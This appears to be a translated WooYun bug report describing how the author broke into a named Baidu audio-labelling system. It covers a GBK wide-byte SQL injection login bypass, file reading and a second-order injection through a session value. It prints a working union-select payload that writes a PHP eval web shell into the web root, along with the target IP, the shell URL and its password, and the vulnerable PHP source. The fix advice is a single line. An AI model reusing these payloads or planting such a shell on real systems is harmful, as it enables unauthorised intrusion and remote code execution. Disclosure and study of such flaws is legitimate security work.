
SQL injection to getshell on a Baidu system

2016-01-15 00:30

http://115.239.210.62:8080 is a Baidu system related to audio.



The page is served as GBK, so a wide-byte injection is suspected.



1.png





`%df' or 1#` bypasses the login.



2.png







3.png





Once in the backend I wanted to get a shell, but there is no upload function anywhere.

Some pages happen to print warnings that reveal the filesystem path, so I tried the earlier method of writing a shell through the injection.



4.png





But the single quote in `into outfile '<path>'` gets escaped there, so writing a shell that way does not work.
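Why the `%df'` trick works at login while the backend escaping still blocks a quote, as an added example that is not code from the report or the audited system. It models byte-wise escaping (what `mysql_real_escape_string` does when the client charset is single-byte) against GBK-aware escaping (after `mysql_set_charset('gbk')`), and scans the result the way a GBK server lexer reads a string literal; the function names and the sample inputs are constructed here.

```python
def _gbk_head(b: int) -> bool:  # GBK lead byte range
    return 0x81 <= b <= 0xFE
def _gbk_tail(b: int) -> bool:  # GBK trail byte range; note that 0x5C qualifies
    return 0x40 <= b <= 0x7E or 0x80 <= b <= 0xFE

def gbk_char_len(data: bytes, i: int) -> int:
    """2 if data[i:i+2] is a valid GBK double-byte character, else 1."""
    if _gbk_head(data[i]) and i + 1 < len(data) and _gbk_tail(data[i + 1]):
        return 2
    return 1

# Bytes that escaping rewrites (the mysql_real_escape_string set).
SPECIAL = {0x00: b"\\0", 0x0A: b"\\n", 0x0D: b"\\r", 0x1A: b"\\Z",
           0x22: b'\\"', 0x27: b"\\'", 0x5C: b"\\\\"}

def escape_bytewise(data: bytes) -> bytes:
    """Single-byte client charset (the report's login): every special byte
    gets a backslash, multibyte structure is ignored."""
    return b"".join(SPECIAL.get(b, bytes([b])) for b in data)

def escape_gbk_aware(data: bytes) -> bytes:
    """After mysql_set_charset('gbk'): valid GBK pairs pass through, and a lead
    byte with no valid trail is itself escaped, so it can no longer pair with
    the backslash placed before the quote."""
    out, i = bytearray(), 0
    while i < len(data):
        n = gbk_char_len(data, i)
        if n == 2:
            out += data[i:i + 2]
        elif _gbk_head(data[i]):
            out += b"\\" + bytes([data[i]])
        else:
            out += SPECIAL.get(data[i], bytes([data[i]]))
        i += n
    return bytes(out)

def literal_ends_early(escaped: bytes) -> bool:
    """Scan like a GBK server lexer inside a '...' literal: True when an
    unescaped quote is reached, i.e. the rest of the input becomes SQL."""
    i = 0
    while i < len(escaped):
        if gbk_char_len(escaped, i) == 2:
            i += 2                  # one whole character, 0x5C tail included
        elif escaped[i] == 0x5C:
            i += 2                  # backslash escapes the next byte
        elif escaped[i] == 0x27:
            return True
        else:
            i += 1
    return False
```

With the constructed name `b"test\xdf' or 1#"`, `escape_bytewise` yields `\xdf\x5c\x27`, which the GBK lexer reads as one character followed by a live quote, while `escape_gbk_aware` yields `\x5c\xdf\x5c\x27` and the literal stays closed; prepared statements avoid the question entirely.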



The backend has many injection points, so I tried reading files instead.



6.png





Files can be read, so the next step is to audit the source code for a way to get a shell.



Code:
/home/audio/label/apache/htdocs/new_user_post.php
/home/audio/label/apache/htdocs/new_user.php
/home/audio/label/apache/htdocs/label/index.php
/home/audio/label/apache/htdocs/register.php
/home/audio/label/apache/htdocs/user_management.php
/home/audio/label/apache/htdocs/user_modify.php
/home/audio/label/apache/htdocs/user_work.php
/home/audio/label/apache/htdocs/user_work_show.php
/home/audio/label/apache/htdocs/session_destroy.php
/home/audio/label/apache/htdocs/user_delete.php
/home/audio/label/apache/htdocs/member_login.php
/home/audio/label/apache/htdocs/inc.php
/home/audio/label/apache/htdocs/user_modify_post.php





Reading the files above shows plain create/read/update/delete logic and nothing else.

The injection points cannot introduce a single quote, but from experience a second-order injection can.

So the next step is to look for a second-order injection whose injection point sits inside a select, because only there can writing a file be attempted.

The breakthrough is in the following files:

Code:
/home/audio/label/apache/htdocs/user_work.php
/home/audio/label/apache/htdocs/user_work_show.php





Code:
<?php
require('inc.php');
if (isset($_SESSION['wav']) && is_file($_SESSION['wav']) && !unlink($_SESSION['wav']))
{
    echo "Warning:deleting".$_SESSION['wav']."failed";
}
if (isset($_SESSION['pic']) && is_file($_SESSION['pic']) && !unlink($_SESSION['pic']))
{
    echo "Warning:deleting".$_SESSION['pic']."failed";
}
if (isset($_SESSION['adpcm']) && is_file($_SESSION['adpcm']) && !unlink($_SESSION['adpcm']))
{
    echo "Warning:deleting".$_SESSION['adpcm']."failed";
}
if(isset($_GET['jump']))
{
    if($_GET['jump']==1)
    {
        unset($_SESSION['speechid'],$_SESSION['adpcm'],$_SESSION['wav'],$_SESSION['pic'],$_SESSION['table'],$_SESSION['effect'],$_SESSION['cut'],$_SESSION['noise'],$_SESSION['lang'],$_SESSION['comment'],$_SESSION['accent'],$_SESSION['sex'],$_SESSION['conf'],$_SESSION['fu']);
    }
    else if($_GET['jump']==2)
    {
        unset($_SESSION['speechid'],$_SESSION['adpcm'],$_SESSION['wav'],$_SESSION['pic'],$_SESSION['effect'],$_SESSION['table'],$_SESSION['cut'],$_SESSION['noise'],$_SESSION['lang'],$_SESSION['comment'],$_SESSION['accent'],$_SESSION['sex'],$_SESSION['conf'],$_SESSION['fu'],$_SESSION['fcon'],$_SESSION['su']);
    }
}
if(empty($_SESSION['pass']) || $_SESSION['pass']!="ok")
{
    echo "请您重新<a href='index.php'>登录</a></br>";
    header("refresh:2; URL='index.php'");
    exit;
}
$link = getAN_DBLink();
// $_SESSION['auth'] and $_SESSION['id'] are concatenated into the query without
// quoting or casting: whatever the login stored in the session becomes SQL here.
if($_SESSION['auth']==2)
{
    $sql="select id,Name,authority,real_name from annotator where id=".$_SESSION['id']."";
}
else if($_SESSION['auth']==1)
{
    $sql="select id,Name,authority,real_name from annotator where authority>".$_SESSION['auth']." or id=".$_SESSION['id']."";
}
else if($_SESSION['auth']==0)
{
    $sql="select id,Name,authority,real_name from annotator where authority>=".$_SESSION['auth']."";
}
else
{
    echo "权限分配有误,请重新<a href='index.php'>登录</a></br>";
    header("refresh:2; URL='index.php'");
    exit;
}
$con="[query:".date('c')."]查询数据:".$sql.":user_work.php:line 61\r\n";
write_log($con);
$result=mysql_query($sql) or die("数据库查询失败");
$num=mysql_num_rows($result);
if($_SESSION['work']=="annotate")
    $chn_type="标注";
else if($_SESSION['work']=="check")
    $chn_type="检查";
else
    $chn_type="精选";
?>





Code:
else if($_SESSION['auth']==0)
{
    $sql="select id,Name,authority,real_name from annotator where authority>=".$_SESSION['auth']."";
}



$_SESSION['auth'] is the only parameter I found that is used inside a select and might be controllable.

$_SESSION is populated at login, so let's look at the login file.



Code:
/home/audio/label/apache/htdocs/member_login.php





Code:
<?php
require_once ('inc.php');
if(empty($_POST['name'])){
    echo "用户名不能为空,自动返回登录界面...</br></br>";
    echo "点击返回<a href='index.php'>登录界面</a>";
    header("refresh:2; URL='index.php'");
    //echo "用户名不能为空,自动返回登录界面...</br></br>";
    //echo "点击返回<a href='index.php'>登录界面</a>";
    // header('Location:http://10.210.26.11:8080/index.php');
    exit;
}
else if(empty($_POST['password'])){
    echo "密码不能为空,自动返回登录界面...</br></br>";
    echo "点击返回<a href='index.php'>登录界面</a>";
    header("refresh:2; URL='index.php'");
    exit;
}
else if(empty($_POST['yzm'])){
    echo "验证码不能为空,自动返回登录界面...</br></br>";
    echo "点击返回<a href='index.php'>登录界面</a>";
    header("refresh:2; URL='index.php'");
    exit;
}
$link = getAN_DBLink();
// Escaping is done byte by byte while the page is GBK: a trailing 0xDF lead byte
// in the name pairs with the inserted backslash, so the quote stays unescaped.
$name = mysql_real_escape_string($_POST['name'], $link);
$pw = mysql_real_escape_string($_POST['password'], $link);
$code =$_POST['yzm'];
if( $code != $_SESSION["Checknum"])
{
    echo "验证码错误,自动返回登录界面...</br></br>";
    echo "点击返回<a href='index.php'>登录界面</a>";
    mysql_close();
    header("refresh:2; URL='index.php'");
    exit;
}
$sql="select id,authority,real_name,Gender,Mobile,Ikey,Mail,Login_ip,Login_time from annotator where Name='".$name."' and Passwd='".md5($pw)."'";
$con="[query:".date('c')."]数据库查询:".$sql.":member_login.php:line 43\r\n";
write_log($con);
$result=mysql_query($sql, $link) or die("数据库查询失败");
$num=mysql_num_rows($result);
if($num==0)
{
    echo "账户不存在,自动返回登录界面...</br></br>";
    echo "点击返回<a href='index.php'>登录界面</a>";
    mysql_close();
    header("refresh:2; URL='index.php'");
    exit;
}
$rs=mysql_fetch_object($result);
//while($rs=mysql_fetch_object($result))
if ($rs != false)
{
    $_SESSION['pass'] ="ok";
    $_SESSION['num'] =0;
    $_SESSION['name'] =$name;
    $_SESSION['id'] =$rs->id;
    // The row may come from a union select rather than the annotator table,
    // so this session value is stored without validation and reused later.
    $_SESSION['auth'] =$rs->authority;
    $_SESSION['rname'] =$rs->real_name;
    $_SESSION['gender'] =$rs->Gender;
    $_SESSION['mobile'] =$rs->Mobile;
    $_SESSION['ikey'] =$rs->Ikey;
    $_SESSION['mail'] =$rs->Mail;
    $_SESSION['type'] =$_POST['type'];
    $time =date('U');
    $ip ="";
    if(isset($_SERVER['HTTP_CLIENT_IP']))
    {
        $ip=$_SERVER['HTTP_CLIENT_IP'];
    }
    else if(isset($_SERVER['HTTP_X_FORWARDED_FOR']))
    {
        $ip=$_SERVER['HTTP_X_FORWARDED_FOR'];
    }
    else{
        $ip=$_SERVER['REMOTE_ADDR'];
    }





Code:
$_SESSION['auth']     =$rs->authority;





And $rs in turn is the row returned by

Code:
$sql="select id,authority,real_name,Gender,Mobile,Ikey,Mail,Login_ip,Login_time from annotator where Name='".$name."' and Passwd='".md5($pw)."'"



So at login a union query can set authority directly.

Passing the following as name is enough:

Code:
test%df' union select 1,0x3020756e696f6e2073656c65637420312c322c332c3c3f706870206576616c28245f504f53545b735d293b3f3e20696e746f206f757466696c6520272f686f6d652f617564696f2f6c6162656c2f6170616368652f6874646f63732f746573742e70687027,3,4,5,6,7,8,9#





Code (the hex literal decodes to the second line):
0x3020756e696f6e2073656c65637420312c322c332c3c3f706870206576616c28245f504f53545b735d293b3f3e20696e746f206f757466696c6520272f686f6d652f617564696f2f6c6162656c2f6170616368652f6874646f63732f746573742e70687027
0 union select 1,2,3,<?php eval($_POST[s]);?> into outfile '/home/audio/label/apache/htdocs/test.php'





The union query not only bypasses the login, it also sets the second column, which becomes $_SESSION['auth'], to `0 union select 1,2,3,<?php eval($_POST[s]);?> into outfile '/home/audio/label/apache/htdocs/test.php'`.

After logging in, simply visiting user_work.php runs that stored value as part of its select.

This produces a shell at http://115.239.210.62:8080/label/test.php, password: s



QQ图片20151130132632.png





The host is on an internal network; I did not go further.

Proof of vulnerability: the same walkthrough and screenshots as in the description above.


Fix suggestion:

Everything after login is injectable.

Source: www.wooyun.org/bugs/wooyun-2016-0157024
